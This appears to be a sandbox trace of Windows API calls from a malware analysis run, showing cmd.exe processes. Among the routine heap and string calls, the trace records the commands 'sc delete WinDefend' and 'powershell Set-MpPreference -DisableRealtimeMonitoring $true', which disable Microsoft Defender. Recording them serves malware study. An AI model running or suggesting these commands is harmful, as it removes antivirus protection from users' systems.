	[0046.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a854c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0046.781] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a854c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0046.781] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a854930, cchData=8 | out: lpLCData=".") returned 2
	[0046.781] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a854920, cchData=8 | out: lpLCData=",") returned 2
	[0046.781] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0046.782] GetProcessHeap () returned 0x270000
	[0046.782] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20c) returned 0x2827b8
	[0046.782] GetConsoleTitleW (in: lpConsoleTitle=0x2827b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0046.782] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0046.782] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0046.782] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0046.782] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0046.783] GetProcessHeap () returned 0x270000
	[0046.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x400a) returned 0x283a30
	[0046.783] GetProcessHeap () returned 0x270000
	[0046.783] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x283a30 | out: hHeap=0x270000) returned 1
	[0046.783] _wcsicmp (_String1="sc", _String2=")") returned 74
	[0046.783] _wcsicmp (_String1="FOR", _String2="sc") returned -13
	[0046.783] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13
	[0046.783] _wcsicmp (_String1="IF", _String2="sc") returned -10
	[0046.783] _wcsicmp (_String1="IF/?", _String2="sc") returned -10
	[0046.783] _wcsicmp (_String1="REM", _String2="sc") returned -1
	[0046.783] _wcsicmp (_String1="REM/?", _String2="sc") returned -1
	[0046.783] GetProcessHeap () returned 0x270000
	[0046.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x58) returned 0x2829d0
	[0046.783] GetProcessHeap () returned 0x270000
	[0046.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xe) returned 0x27d580
	[0046.783] GetProcessHeap () returned 0x270000
	[0046.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x2c) returned 0x282a30
	[0046.784] GetConsoleTitleW (in: lpConsoleTitle=0x1af698, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0046.784] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0046.784] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0046.784] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0046.784] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0046.784] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0046.784] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0046.784] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0046.784] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0046.784] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0046.784] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0046.784] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0046.784] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0046.784] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0046.784] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0046.784] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0046.784] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0046.784] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0046.784] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0046.784] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0046.784] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0046.785] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0046.785] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0046.785] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0046.785] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0046.785] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0046.785] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0046.785] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0046.785] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0046.785] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0046.785] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0046.785] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0046.785] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0046.785] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0046.785] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0046.785] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0046.785] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0046.785] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0046.785] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0046.786] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0046.786] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0046.786] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0046.786] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0046.786] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0046.786] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0046.786] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0046.786] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0046.786] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0046.786] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0046.786] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0046.786] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0046.786] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0046.786] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0046.786] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0046.786] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0046.786] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0046.786] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0046.786] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0046.786] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0046.786] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0046.786] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0046.786] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0046.786] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0046.786] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0046.786] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0046.786] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0046.786] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0046.786] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0046.786] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0046.786] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0046.786] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0046.786] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0046.786] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0046.786] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0046.786] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0046.786] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0046.786] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0046.786] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0046.786] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0046.786] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0046.786] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0046.786] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0046.786] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0046.786] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0046.787] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0046.787] _wcsicmp (_String1="sc", _String2="FOR") returned 13
	[0046.787] _wcsicmp (_String1="sc", _String2="IF") returned 10
	[0046.787] _wcsicmp (_String1="sc", _String2="REM") returned 1
	[0046.787] GetProcessHeap () returned 0x270000
	[0046.787] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x210) returned 0x282a68
	[0046.787] GetProcessHeap () returned 0x270000
	[0046.787] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x32) returned 0x282c80
	[0046.787] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16
	[0046.787] GetProcessHeap () returned 0x270000
	[0046.787] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x418) returned 0x2707f0
	[0046.787] SetErrorMode (uMode=0x0) returned 0x0
	[0046.787] SetErrorMode (uMode=0x1) returned 0x0
	[0046.787] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2707f8, lpFilePart=0x1af1b8 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1af1b8*="system32") returned 0x13
	[0046.787] SetErrorMode (uMode=0x0) returned 0x1
	[0046.787] GetProcessHeap () returned 0x270000
	[0046.787] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2707f0, Size=0x36) returned 0x2707f0
	[0046.787] GetProcessHeap () returned 0x270000
	[0046.787] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x2707f0) returned 0x36
	[0046.787] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0046.787] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0046.787] GetProcessHeap () returned 0x270000
	[0046.787] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x144) returned 0x282cc0
	[0046.787] GetProcessHeap () returned 0x270000
	[0046.787] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x280) returned 0x282e10
	[0046.792] GetProcessHeap () returned 0x270000
	[0046.792] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x282e10, Size=0x146) returned 0x282e10
	[0046.793] GetProcessHeap () returned 0x270000
	[0046.793] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x282e10) returned 0x146
	[0046.793] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0046.793] GetProcessHeap () returned 0x270000
	[0046.793] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xe0) returned 0x282f60
	[0046.793] GetProcessHeap () returned 0x270000
	[0046.793] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x282f60, Size=0x76) returned 0x282f60
	[0046.793] GetProcessHeap () returned 0x270000
	[0046.793] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x282f60) returned 0x76
	[0046.793] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0046.793] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x1aef34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aef34) returned 0x282fe0
	[0046.794] GetProcessHeap () returned 0x270000
	[0046.794] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x14) returned 0x283020
	[0046.794] FindClose (in: hFindFile=0x282fe0 | out: hFindFile=0x282fe0) returned 1
	[0046.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x1aef34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aef34) returned 0xffffffff
	[0046.794] GetLastError () returned 0x2
	[0046.794] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aef34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aef34) returned 0x282fe0
	[0046.794] GetProcessHeap () returned 0x270000
	[0046.794] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x283020, Size=0x4) returned 0x283020
	[0046.794] FindClose (in: hFindFile=0x282fe0 | out: hFindFile=0x282fe0) returned 1
	[0046.794] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0046.794] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0046.794] GetConsoleTitleW (in: lpConsoleTitle=0x1af42c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0046.794] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af2b4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af37c | out: lpAttributeList=0x1af2b4, lpSize=0x1af37c) returned 1
	[0046.794] UpdateProcThreadAttribute (in: lpAttributeList=0x1af2b4, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af374, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af2b4, lpPreviousValue=0x0) returned 1
	[0046.794] GetStartupInfoW (in: lpStartupInfo=0x1af270 | out: lpStartupInfo=0x1af270*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) 
	[0046.794] GetProcessHeap () returned 0x270000
	[0046.794] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x18) returned 0x282fe0
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0046.795] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0046.795] GetProcessHeap () returned 0x270000
	[0046.795] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x282fe0 | out: hHeap=0x270000) returned 1
	[0046.795] GetProcessHeap () returned 0x270000
	[0046.795] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xa) returned 0x27d598
	[0046.795] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1
	[0046.797] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc  delete WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1af310*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="sc  delete WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af35c | out: lpCommandLine="sc  delete WinDefend", lpProcessInformation=0x1af35c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf14, dwThreadId=0xf18)) returned 1
	[0046.800] CloseHandle (hObject=0x4c) returned 1
	[0046.800] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0046.800] GetProcessHeap () returned 0x270000
	[0046.800] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x281df8 | out: hHeap=0x270000) returned 1
	[0046.800] GetEnvironmentStringsW () returned 0x281df8*
	[0046.800] GetProcessHeap () returned 0x270000
	[0046.800] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x97a) returned 0x280450
	[0046.800] FreeEnvironmentStringsW (penv=0x281df8) returned 1
	[0046.800] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0046.833] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af250 | out: lpExitCode=0x1af250*=0x5) returned 1
	[0046.833] CloseHandle (hObject=0x50) returned 1
	[0046.833] _vsnwprintf (in: _Buffer=0x1af398, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af25c | out: _Buffer="00000005") returned 8
	[0046.833] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000005") returned 1
	[0046.833] GetProcessHeap () returned 0x270000
	[0046.833] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x280450 | out: hHeap=0x270000) returned 1
	[0046.833] GetEnvironmentStringsW () returned 0x283030*
	[0046.833] GetProcessHeap () returned 0x270000
	[0046.833] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x9a0) returned 0x280450
	[0046.833] FreeEnvironmentStringsW (penv=0x283030) returned 1
	[0046.833] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0046.833] GetProcessHeap () returned 0x270000
	[0046.833] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x280450 | out: hHeap=0x270000) returned 1
	[0046.833] GetEnvironmentStringsW () returned 0x283030*
	[0046.833] GetProcessHeap () returned 0x270000
	[0046.833] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x9a0) returned 0x280450
	[0046.834] FreeEnvironmentStringsW (penv=0x283030) returned 1
	[0046.834] GetProcessHeap () returned 0x270000
	[0046.834] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x27d598 | out: hHeap=0x270000) returned 1
	[0046.834] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af2b4 | out: lpAttributeList=0x1af2b4) 
	[0046.834] _get_osfhandle (_FileHandle=1) returned 0x7
	[0046.834] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0046.834] _get_osfhandle (_FileHandle=1) returned 0x7
	[0046.834] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1
	[0046.834] _get_osfhandle (_FileHandle=0) returned 0x3
	[0046.834] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1
	[0046.834] SetConsoleInputExeNameW () returned 0x1
	[0046.834] GetConsoleOutputCP () returned 0x1b5
	[0046.834] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0046.834] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0046.834] exit (_Code=5) 

Process:
	id = "11"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee17640"
	os_pid = "0xeec"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xd50"
	cmd_line = "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 28
	os_tid = 0xef0

	[0046.565] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x17f788 | out: lpSystemTimeAsFileTime=0x17f788*(dwLowDateTime=0x7995c80, dwHighDateTime=0x1d50a6a)) 
	[0046.565] GetCurrentProcessId () returned 0xeec
	[0046.565] GetCurrentThreadId () returned 0xef0
	[0046.565] GetTickCount () returned 0xa647bc
	[0046.565] QueryPerformanceCounter (in: lpPerformanceCount=0x17f780 | out: lpPerformanceCount=0x17f780*=12040302238) returned 1
	[0046.566] GetModuleHandleA (lpModuleName=0x0) returned 0x4a830000
	[0046.566] __set_app_type (_Type=0x1) 
	[0046.566] __p__fmode () returned 0x770231f4
	[0046.566] __p__commode () returned 0x770231fc
	[0046.566] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8521a6) returned 0x0
	[0046.567] __getmainargs (in: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c, _DoWildCard=0, _StartInfo=0x4a854140 | out: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c) returned 0
	[0046.567] GetCurrentThreadId () returned 0xef0
	[0046.567] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xef0) returned 0x38
	[0046.567] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0046.567] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0046.567] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0046.567] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0046.567] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x17f718 | out: phkResult=0x17f718*=0x0) returned 0x2
	[0046.568] VirtualQuery (in: lpAddress=0x17f74f, lpBuffer=0x17f6e8, dwLength=0x1c | out: lpBuffer=0x17f6e8*(BaseAddress=0x17f000, AllocationBase=0x80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0046.568] VirtualQuery (in: lpAddress=0x80000, lpBuffer=0x17f6e8, dwLength=0x1c | out: lpBuffer=0x17f6e8*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0046.568] VirtualQuery (in: lpAddress=0x81000, lpBuffer=0x17f6e8, dwLength=0x1c | out: lpBuffer=0x17f6e8*(BaseAddress=0x81000, AllocationBase=0x80000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0046.568] VirtualQuery (in: lpAddress=0x83000, lpBuffer=0x17f6e8, dwLength=0x1c | out: lpBuffer=0x17f6e8*(BaseAddress=0x83000, AllocationBase=0x80000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0046.568] VirtualQuery (in: lpAddress=0x180000, lpBuffer=0x17f6e8, dwLength=0x1c | out: lpBuffer=0x17f6e8*(BaseAddress=0x180000, AllocationBase=0x180000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0046.568] GetConsoleOutputCP () returned 0x1b5
	[0046.568] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0046.568] SetConsoleCtrlHandler (HandlerRoutine=0x4a84e72a, Add=1) returned 1
	[0046.568] _get_osfhandle (_FileHandle=1) returned 0x7
	[0046.568] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0046.568] _get_osfhandle (_FileHandle=1) returned 0x7
	[0046.568] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1
	[0046.569] _get_osfhandle (_FileHandle=1) returned 0x7
	[0046.569] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0046.569] _get_osfhandle (_FileHandle=0) returned 0x3
	[0046.569] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1
	[0046.569] _get_osfhandle (_FileHandle=0) returned 0x3
	[0046.569] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0046.569] GetEnvironmentStringsW () returned 0x3702e0*
	[0046.569] GetProcessHeap () returned 0x360000
	[0046.569] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x932) returned 0x370c20
	[0046.570] FreeEnvironmentStringsW (penv=0x3702e0) returned 1
	[0046.570] GetProcessHeap () returned 0x360000
	[0046.570] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x4) returned 0x36fbc0
	[0046.570] GetEnvironmentStringsW () returned 0x3702e0*
	[0046.570] GetProcessHeap () returned 0x360000
	[0046.570] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x932) returned 0x371560
